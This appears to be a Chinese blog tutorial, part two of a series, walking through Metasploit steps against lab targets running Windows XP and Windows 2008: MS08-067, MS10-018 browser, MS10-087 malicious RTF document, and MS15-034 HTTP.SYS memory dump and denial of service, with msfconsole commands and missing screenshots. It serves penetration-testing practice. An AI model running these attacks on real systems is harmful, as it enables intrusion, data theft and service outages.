msf漏洞使用(二)

1、网络服务器攻击渗透(MS08-067)

用到的靶机:win xp

1️⃣、启动kali,输入

msfconsole

出现下列界面

msf漏洞使用(二)_第1张图片

2️⃣、在msf框架下搜索msf08-067漏洞

search msf08-067

msf漏洞使用(二)_第2张图片

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ylIYEdPI-1597553213115)(#MSF.assets/1595579097351.png)]

3️⃣、选择编号为0的木马

use o

4️⃣、输入“info”查看该模块适配的系统

5️⃣、配置要攻击的主机IP

set rhosts 192.168.60.150

6️⃣、配置完成后可以通过“show options”查看配置的信息

7️⃣、完成配置后,执行命令“run“,是模块跑起来。

2、 浏览器攻击渗透(MS10-018)

用到的靶机:win xp

1️⃣、启动msf,搜索ms10-018

“back”返回命令

2️⃣、msf框架下搜索“ms10-018”

search msf10-018

msf漏洞使用(二)_第3张图片

3️⃣、执行0模块

use 0

4️⃣、查看该模块适配信息

show options

5️⃣、配置相应的参数

#6️⃣、(run)

msf漏洞使用(二)_第4张图片

将框内网址复制靶机浏览器运行一下

7️⃣、根据提示选择相应序号进入靶机系统

3、应用软件格式渗透,利用word去渗透(MS10-087)

靶机win xp

1️⃣、启动msf,搜索ms10-087

search ms10-087

msf漏洞使用(二)_第5张图片

2️⃣、使用模块0

msf5 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

3️⃣、进入模块o后,“show options“了解详细信息

msf漏洞使用(二)_第6张图片

4️⃣、修改其中文件的名字

5️⃣、增加攻击模块

6️⃣、配置完毕,run一下

7️⃣、找到输出的文件夹,复制到靶机

msf漏洞使用(二)_第7张图片

8️⃣、运行复制到靶机的文件

msf漏洞使用(二)_第8张图片

4、CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

靶机win 2008

1️⃣、启动msf,搜索ms15-034模块

msf漏洞使用(二)_第9张图片

2️⃣、进入1模块,查询模块信息

msf5 > use 1
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > show options

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mis0u8DV-1597553213131)(#MSF.assets/1595599731375.png)]

3️⃣、根据查询到的信息,进行配置

msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 192.168.60.166
rhosts => 192.168.60.166

4️⃣、配置完毕,执行攻击

msf漏洞使用(二)_第10张图片

得到靶机服务器内存数据

利用ms15-034漏洞进行ddos攻击

msf漏洞使用(二)_第11张图片

你可能感兴趣的:(msf漏洞使用(二))